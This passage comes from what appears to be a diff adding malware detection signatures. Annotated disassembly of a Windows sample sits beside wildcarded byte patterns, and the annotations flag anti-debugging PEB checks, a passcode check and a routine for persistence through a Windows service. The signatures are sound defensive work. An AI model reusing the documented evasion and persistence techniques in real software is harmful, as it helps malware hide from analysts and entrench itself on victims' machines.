+ .text:0x00402c11 f2ae repnz: scasb + .text:0x00402c13 f7d1 not ecx + .text:0x00402c15 83c1ff add ecx,0xffffffff + .text:0x00402c18 51 push ecx + .text:0x00402c19 68b0c04000 push 0x0040c0b0 + .text:0x00402c1e 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402c24 50 push eax + .text:0x00402c25 e826150000 call 0x00404150 ;_strncmp(local1028,0x0040c0b0,0xffffffff) + .text:0x00402c2a 83c40c add esp,12 + .text:0x00402c2d loc_00402c2d: [4 XREFS] + .text:0x00402c2d 33c0 xor eax,eax + .text:0x00402c2f loc_00402c2f: [5 XREFS] + .text:0x00402c2f 5f pop edi + .text:0x00402c30 5e pop esi + .text:0x00402c31 5b pop ebx + .text:0x00402c32 8be5 mov esp,ebp + .text:0x00402c34 5d pop ebp + .text:0x00402c35 c3 ret + */ + $c39 = { 55 8B EC 81 EC 30 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? 
?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF DC C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 DC C0 40 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 75 ?? 68 D8 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 69 D2 E8 03 00 00 52 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF D0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 D0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF C4 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 C4 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF C0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 C0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? 
?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 BC C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 B8 C0 40 00 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? BF B0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 B0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402c40@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402c40 + .text:0x00402c40 FUNC: int cdecl sub_00402c40( ) [2 XREFS] + .text:0x00402c40 + .text:0x00402c40 Stack Variables: (offset from initial top of stack) + .text:0x00402c40 -1028: int local1028 + .text:0x00402c40 -2052: int local2052 + .text:0x00402c40 -3076: int local3076 + .text:0x00402c40 -4100: int local4100 + .text:0x00402c40 -4104: int local4104 + .text:0x00402c40 -4108: int local4108 + .text:0x00402c40 -4112: int local4112 + .text:0x00402c40 + .text:0x00402c40 55 push ebp + .text:0x00402c41 8bec mov ebp,esp + .text:0x00402c43 b80c100000 mov eax,0x0000100c + .text:0x00402c48 e8230d0000 call 0x00403970 ;__alloca_probe() + .text:0x00402c4d 53 push ebx + .text:0x00402c4e 56 push esi + .text:0x00402c4f 57 push edi + .text:0x00402c50 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x00402c5a c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x00402c64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402c6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402c6d 889dfcefffff mov byte [ebp - 4100],bl + .text:0x00402c73 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x00402c7a 85c0 test eax,eax + .text:0x00402c7c 7405 jz 0x00402c83 + .text:0x00402c7e e87de3ffff call 0x00401000 ;sub_00401000() + .text:0x00402c83 loc_00402c83: [1 XREFS] + .text:0x00402c83 64a130000000 fs: 
mov eax,dword [0x00000030] + .text:0x00402c89 8b4018 mov eax,dword [eax + 24] + .text:0x00402c8c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402c90 8985f8efffff mov dword [ebp - 4104],eax + .text:0x00402c96 83bdf8efffff00 cmp dword [ebp - 4104],0 + .text:0x00402c9d 7405 jz 0x00402ca4 + .text:0x00402c9f e85ce3ffff call 0x00401000 ;sub_00401000() + .text:0x00402ca4 loc_00402ca4: [1 XREFS] + .text:0x00402ca4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402caa 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402cae 83e870 sub eax,112 + .text:0x00402cb1 8985f4efffff mov dword [ebp - 4108],eax + .text:0x00402cb7 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x00402cbe 7505 jnz 0x00402cc5 + .text:0x00402cc0 e83be3ffff call 0x00401000 ;sub_00401000() + .text:0x00402cc5 loc_00402cc5: [2 XREFS] + .text:0x00402cc5 b901000000 mov ecx,1 + .text:0x00402cca 85c9 test ecx,ecx + .text:0x00402ccc 0f848e000000 jz 0x00402d60 + .text:0x00402cd2 6800040000 push 1024 + .text:0x00402cd7 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402cdd 52 push edx + .text:0x00402cde 6800040000 push 1024 + .text:0x00402ce3 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402ce9 50 push eax + .text:0x00402cea 6800040000 push 1024 + .text:0x00402cef 8d8d00f8ffff lea ecx,dword [ebp - 2048] + .text:0x00402cf5 51 push ecx + .text:0x00402cf6 6800040000 push 1024 + .text:0x00402cfb 8d9500f4ffff lea edx,dword [ebp - 3072] + .text:0x00402d01 52 push edx + .text:0x00402d02 e8a9e7ffff call 0x004014b0 ;sub_004014b0(local3076,1024,local2052,1024,local4100,1024,local1028) + .text:0x00402d07 83c420 add esp,32 + .text:0x00402d0a 85c0 test eax,eax + .text:0x00402d0c 7407 jz 0x00402d15 + .text:0x00402d0e b801000000 mov eax,1 + .text:0x00402d13 eb4d jmp 0x00402d62 + .text:0x00402d15 loc_00402d15: [1 XREFS] + .text:0x00402d15 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402d1b 50 push eax + .text:0x00402d1c e8090d0000 call 0x00403a2a ;_atoi(local4100) + .text:0x00402d21 83c404 add esp,4 
+ .text:0x00402d24 50 push eax + .text:0x00402d25 8d8d00f8ffff lea ecx,dword [ebp - 2048] + .text:0x00402d2b 51 push ecx + .text:0x00402d2c e84ffbffff call 0x00402880 ;sub_00402880(local2052) + .text:0x00402d31 83c408 add esp,8 + .text:0x00402d34 85c0 test eax,eax + .text:0x00402d36 7407 jz 0x00402d3f + .text:0x00402d38 b801000000 mov eax,1 + .text:0x00402d3d eb23 jmp 0x00402d62 + .text:0x00402d3f loc_00402d3f: [1 XREFS] + .text:0x00402d3f 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402d45 52 push edx + .text:0x00402d46 e8df0c0000 call 0x00403a2a ;_atoi(local1028) + .text:0x00402d4b 83c404 add esp,4 + .text:0x00402d4e 69c0e8030000 imul eax,eax,1000 + .text:0x00402d54 50 push eax + .text:0x00402d55 ff1538b04000 call dword [0x0040b038] ;kernel32.Sleep(0x4751ba98) + .text:0x00402d5b e965ffffff jmp 0x00402cc5 + .text:0x00402d60 loc_00402d60: [1 XREFS] + .text:0x00402d60 33c0 xor eax,eax + .text:0x00402d62 loc_00402d62: [2 XREFS] + .text:0x00402d62 5f pop edi + .text:0x00402d63 5e pop esi + .text:0x00402d64 5b pop ebx + .text:0x00402d65 8be5 mov esp,ebp + .text:0x00402d67 5d pop ebp + .text:0x00402d68 c3 ret + */ + $c40 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? B9 01 00 00 00 85 C9 0F 84 ?? ?? ?? ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 69 C0 E8 03 00 00 50 FF 15 ?? ?? ?? ?? E9 ?? 
?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402d70@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402d70 + .text:0x00402d70 FUNC: int cdecl sub_00402d70( int arg0, ) [2 XREFS] + .text:0x00402d70 + .text:0x00402d70 Stack Variables: (offset from initial top of stack) + .text:0x00402d70 4: int arg0 + .text:0x00402d70 -8: int local8 + .text:0x00402d70 -12: int local12 + .text:0x00402d70 -16: int local16 + .text:0x00402d70 -20: int local20 + .text:0x00402d70 + .text:0x00402d70 55 push ebp + .text:0x00402d71 8bec mov ebp,esp + .text:0x00402d73 83ec10 sub esp,16 + .text:0x00402d76 53 push ebx + .text:0x00402d77 56 push esi + .text:0x00402d78 57 push edi + .text:0x00402d79 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402d80 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402d87 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402d8d 8a5802 mov bl,byte [eax + 2] + .text:0x00402d90 885df8 mov byte [ebp - 8],bl + .text:0x00402d93 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402d97 85c0 test eax,eax + .text:0x00402d99 7405 jz 0x00402da0 + .text:0x00402d9b e860e2ffff call 0x00401000 ;sub_00401000() + .text:0x00402da0 loc_00402da0: [1 XREFS] + .text:0x00402da0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402da6 8b4018 mov eax,dword [eax + 24] + .text:0x00402da9 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402dad 8945f4 mov dword [ebp - 12],eax + .text:0x00402db0 837df400 cmp dword [ebp - 12],0 + .text:0x00402db4 7405 jz 0x00402dbb + .text:0x00402db6 e845e2ffff call 0x00401000 ;sub_00401000() + .text:0x00402dbb loc_00402dbb: [1 XREFS] + .text:0x00402dbb 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402dc1 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402dc5 83e870 sub eax,112 + .text:0x00402dc8 8945f0 mov dword [ebp - 16],eax + .text:0x00402dcb 837df000 cmp dword [ebp - 16],0 + .text:0x00402dcf 7505 jnz 0x00402dd6 + .text:0x00402dd1 e82ae2ffff call 0x00401000 
;sub_00401000() + .text:0x00402dd6 loc_00402dd6: [1 XREFS] + .text:0x00402dd6 8b7d08 mov edi,dword [ebp + 8] + .text:0x00402dd9 83c9ff or ecx,0xffffffff + .text:0x00402ddc 33c0 xor eax,eax + .text:0x00402dde f2ae repnz: scasb + .text:0x00402de0 f7d1 not ecx + .text:0x00402de2 83c1ff add ecx,0xffffffff + .text:0x00402de5 83f904 cmp ecx,4 + .text:0x00402de8 7404 jz 0x00402dee + .text:0x00402dea 33c0 xor eax,eax + .text:0x00402dec eb74 jmp 0x00402e62 + .text:0x00402dee loc_00402dee: [1 XREFS] + .text:0x00402dee 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402df1 8a11 mov dl,byte [ecx] + .text:0x00402df3 8855fc mov byte [ebp - 4],dl + .text:0x00402df6 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00402dfa 83f861 cmp eax,97 + .text:0x00402dfd 7404 jz 0x00402e03 + .text:0x00402dff 33c0 xor eax,eax + .text:0x00402e01 eb5f jmp 0x00402e62 + .text:0x00402e03 loc_00402e03: [1 XREFS] + .text:0x00402e03 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402e06 8a5101 mov dl,byte [ecx + 1] + .text:0x00402e09 8855fc mov byte [ebp - 4],dl + .text:0x00402e0c 8b4508 mov eax,dword [ebp + 8] + .text:0x00402e0f 8a4dfc mov cl,byte [ebp - 4] + .text:0x00402e12 2a08 sub cl,byte [eax] + .text:0x00402e14 884dfc mov byte [ebp - 4],cl + .text:0x00402e17 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x00402e1b 83fa01 cmp edx,1 + .text:0x00402e1e 7404 jz 0x00402e24 + .text:0x00402e20 33c0 xor eax,eax + .text:0x00402e22 eb3e jmp 0x00402e62 + .text:0x00402e24 loc_00402e24: [1 XREFS] + .text:0x00402e24 8a45fc mov al,byte [ebp - 4] + .text:0x00402e27 b163 mov cl,99 + .text:0x00402e29 f6e9 imul cl + .text:0x00402e2b 8845fc mov byte [ebp - 4],al + .text:0x00402e2e 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x00402e32 8b4508 mov eax,dword [ebp + 8] + .text:0x00402e35 0fbe4802 movsx ecx,byte [eax + 2] + .text:0x00402e39 3bd1 cmp edx,ecx + .text:0x00402e3b 7404 jz 0x00402e41 + .text:0x00402e3d 33c0 xor eax,eax + .text:0x00402e3f eb21 jmp 0x00402e62 + .text:0x00402e41 loc_00402e41: [1 XREFS] + .text:0x00402e41 8a55fc mov 
dl,byte [ebp - 4] + .text:0x00402e44 80c201 add dl,1 + .text:0x00402e47 8855fc mov byte [ebp - 4],dl + .text:0x00402e4a 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00402e4e 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00402e51 0fbe5103 movsx edx,byte [ecx + 3] + .text:0x00402e55 3bc2 cmp eax,edx + .text:0x00402e57 7404 jz 0x00402e5d + .text:0x00402e59 33c0 xor eax,eax + .text:0x00402e5b eb05 jmp 0x00402e62 + .text:0x00402e5d loc_00402e5d: [1 XREFS] + .text:0x00402e5d b801000000 mov eax,1 + .text:0x00402e62 loc_00402e62: [5 XREFS] + .text:0x00402e62 5f pop edi + .text:0x00402e63 5e pop esi + .text:0x00402e64 5b pop ebx + .text:0x00402e65 8be5 mov esp,ebp + .text:0x00402e67 5d pop ebp + .text:0x00402e68 c3 ret + */ + $c41 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 83 F9 04 74 ?? 33 C0 EB ?? 8B 4D ?? 8A 11 88 55 ?? 0F BE 45 ?? 83 F8 61 74 ?? 33 C0 EB ?? 8B 4D ?? 8A 51 ?? 88 55 ?? 8B 45 ?? 8A 4D ?? 2A 08 88 4D ?? 0F BE 55 ?? 83 FA 01 74 ?? 33 C0 EB ?? 8A 45 ?? B1 63 F6 E9 88 45 ?? 0F BE 55 ?? 8B 45 ?? 0F BE 48 ?? 3B D1 74 ?? 33 C0 EB ?? 8A 55 ?? 80 C2 01 88 55 ?? 0F BE 45 ?? 8B 4D ?? 0F BE 51 ?? 3B C2 74 ?? 33 C0 EB ?? 
B8 01 00 00 00 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402e70@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402e70 + .text:0x00402e70 FUNC: int cdecl sub_00402e70( int arg0, ) [8 XREFS] + .text:0x00402e70 + .text:0x00402e70 Stack Variables: (offset from initial top of stack) + .text:0x00402e70 4: int arg0 + .text:0x00402e70 -1028: int local1028 + .text:0x00402e70 -1032: int local1032 + .text:0x00402e70 -1036: int local1036 + .text:0x00402e70 -1040: int local1040 + .text:0x00402e70 + .text:0x00402e70 55 push ebp + .text:0x00402e71 8bec mov ebp,esp + .text:0x00402e73 81ec0c040000 sub esp,1036 + .text:0x00402e79 53 push ebx + .text:0x00402e7a 56 push esi + .text:0x00402e7b 57 push edi + .text:0x00402e7c c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x00402e86 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x00402e90 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402e96 8a5802 mov bl,byte [eax + 2] + .text:0x00402e99 889dfcfbffff mov byte [ebp - 1028],bl + .text:0x00402e9f 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x00402ea6 85c0 test eax,eax + .text:0x00402ea8 7405 jz 0x00402eaf + .text:0x00402eaa e851e1ffff call 0x00401000 ;sub_00401000() + .text:0x00402eaf loc_00402eaf: [1 XREFS] + .text:0x00402eaf 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402eb5 8b4018 mov eax,dword [eax + 24] + .text:0x00402eb8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402ebc 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00402ec2 83bdf8fbffff00 cmp dword [ebp - 1032],0 + .text:0x00402ec9 7405 jz 0x00402ed0 + .text:0x00402ecb e830e1ffff call 0x00401000 ;sub_00401000() + .text:0x00402ed0 loc_00402ed0: [1 XREFS] + .text:0x00402ed0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402ed6 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402eda 83e870 sub eax,112 + .text:0x00402edd 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402ee3 83bdf4fbffff00 cmp dword [ebp - 1036],0 + 
.text:0x00402eea 7505 jnz 0x00402ef1 + .text:0x00402eec e80fe1ffff call 0x00401000 ;sub_00401000() + .text:0x00402ef1 loc_00402ef1: [1 XREFS] + .text:0x00402ef1 6800040000 push 1024 + .text:0x00402ef6 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402efc 51 push ecx + .text:0x00402efd 6a00 push 0 + .text:0x00402eff ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local1028,1024) + .text:0x00402f05 85c0 test eax,eax + .text:0x00402f07 7507 jnz 0x00402f10 + .text:0x00402f09 b801000000 mov eax,1 + .text:0x00402f0e eb1b jmp 0x00402f2b + .text:0x00402f10 loc_00402f10: [1 XREFS] + .text:0x00402f10 6a00 push 0 + .text:0x00402f12 8b5508 mov edx,dword [ebp + 8] + .text:0x00402f15 52 push edx + .text:0x00402f16 6a00 push 0 + .text:0x00402f18 6a00 push 0 + .text:0x00402f1a 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402f20 50 push eax + .text:0x00402f21 e862120000 call 0x00404188 ;__splitpath(local1028,arg0,local1028,local1028,0,0,arg0) + .text:0x00402f26 83c414 add esp,20 + .text:0x00402f29 33c0 xor eax,eax + .text:0x00402f2b loc_00402f2b: [1 XREFS] + .text:0x00402f2b 5f pop edi + .text:0x00402f2c 5e pop esi + .text:0x00402f2d 5b pop ebx + .text:0x00402f2e 8be5 mov esp,ebp + .text:0x00402f30 5d pop ebp + .text:0x00402f31 c3 ret + */ + $c42 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8B 55 ?? 52 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 
83 C4 14 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402f40@7faafc7e4a5c736ebfee6abbbc812d80 with 6 features: + - check for PEB NtGlobalFlag flag + - copy file + - create service + - modify service + - persist via Windows service + - query environment variable + .text:0x00402f40 + .text:0x00402f40 FUNC: int cdecl sub_00402f40( int arg0, ) [4 XREFS] + .text:0x00402f40 + .text:0x00402f40 Stack Variables: (offset from initial top of stack) + .text:0x00402f40 4: int arg0 + .text:0x00402f40 -1028: int local1028 + .text:0x00402f40 -1032: int local1032 + .text:0x00402f40 -2056: int local2056 + .text:0x00402f40 -3080: int local3080 + .text:0x00402f40 -4104: int local4104 + .text:0x00402f40 -5128: int local5128 + .text:0x00402f40 -5132: int local5132 + .text:0x00402f40 -5136: int local5136 + .text:0x00402f40 -5140: int local5140 + .text:0x00402f40 -5144: int local5144 + .text:0x00402f40 + .text:0x00402f40 55 push ebp + .text:0x00402f41 8bec mov ebp,esp + .text:0x00402f43 b814140000 mov eax,0x00001414 + .text:0x00402f48 e8230a0000 call 0x00403970 ;__alloca_probe() + .text:0x00402f4d 53 push ebx + .text:0x00402f4e 56 push esi + .text:0x00402f4f 57 push edi + .text:0x00402f50 c785f0ebffff0000 mov dword [ebp - 5136],0 + .text:0x00402f5a c785ecebffff0000 mov dword [ebp - 5140],0 + .text:0x00402f64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402f6d 889df4ebffff mov byte [ebp - 5132],bl + .text:0x00402f73 0fbe85f4ebffff movsx eax,byte [ebp - 5132] + .text:0x00402f7a 85c0 test eax,eax + .text:0x00402f7c 7405 jz 0x00402f83 + .text:0x00402f7e e87de0ffff call 0x00401000 ;sub_00401000() + .text:0x00402f83 loc_00402f83: [1 XREFS] + .text:0x00402f83 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f89 8b4018 mov eax,dword [eax + 24] + .text:0x00402f8c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402f90 8985f0ebffff mov dword [ebp - 5136],eax + .text:0x00402f96 83bdf0ebffff00 cmp dword [ebp - 5136],0 + 
.text:0x00402f9d 7405 jz 0x00402fa4 + .text:0x00402f9f e85ce0ffff call 0x00401000 ;sub_00401000() + .text:0x00402fa4 loc_00402fa4: [1 XREFS] + .text:0x00402fa4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402faa 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402fae 83e870 sub eax,112 + .text:0x00402fb1 8985ecebffff mov dword [ebp - 5140],eax + .text:0x00402fb7 83bdecebffff00 cmp dword [ebp - 5140],0 + .text:0x00402fbe 7505 jnz 0x00402fc5 + .text:0x00402fc0 e83be0ffff call 0x00401000 ;sub_00401000() + .text:0x00402fc5 loc_00402fc5: [1 XREFS] + .text:0x00402fc5 6800040000 push 1024 + .text:0x00402fca 8d8dfcebffff lea ecx,dword [ebp - 5124] + .text:0x00402fd0 51 push ecx + .text:0x00402fd1 e89afeffff call 0x00402e70 ;sub_00402e70(local5128) + .text:0x00402fd6 83c408 add esp,8 + .text:0x00402fd9 85c0 test eax,eax + .text:0x00402fdb 740a jz 0x00402fe7 + .text:0x00402fdd b801000000 mov eax,1 + .text:0x00402fe2 e9c3020000 jmp 0x004032aa + .text:0x00402fe7 loc_00402fe7: [1 XREFS] + .text:0x00402fe7 bf34c14000 mov edi,0x0040c134 + .text:0x00402fec 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402ff2 83c9ff or ecx,0xffffffff + .text:0x00402ff5 33c0 xor eax,eax + .text:0x00402ff7 f2ae repnz: scasb + .text:0x00402ff9 f7d1 not ecx + .text:0x00402ffb 2bf9 sub edi,ecx + .text:0x00402ffd 8bf7 mov esi,edi + .text:0x00402fff 8bc1 mov eax,ecx + .text:0x00403001 8bfa mov edi,edx + .text:0x00403003 c1e902 shr ecx,2 + .text:0x00403006 f3a5 rep: movsd + .text:0x00403008 8bc8 mov ecx,eax + .text:0x0040300a 83e103 and ecx,3 + .text:0x0040300d f3a4 rep: movsb + .text:0x0040300f 8dbdfcebffff lea edi,dword [ebp - 5124] + .text:0x00403015 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040301b 83c9ff or ecx,0xffffffff + .text:0x0040301e 33c0 xor eax,eax + .text:0x00403020 f2ae repnz: scasb + .text:0x00403022 f7d1 not ecx + .text:0x00403024 2bf9 sub edi,ecx + .text:0x00403026 8bf7 mov esi,edi + .text:0x00403028 8bd9 mov ebx,ecx + .text:0x0040302a 8bfa mov edi,edx + 
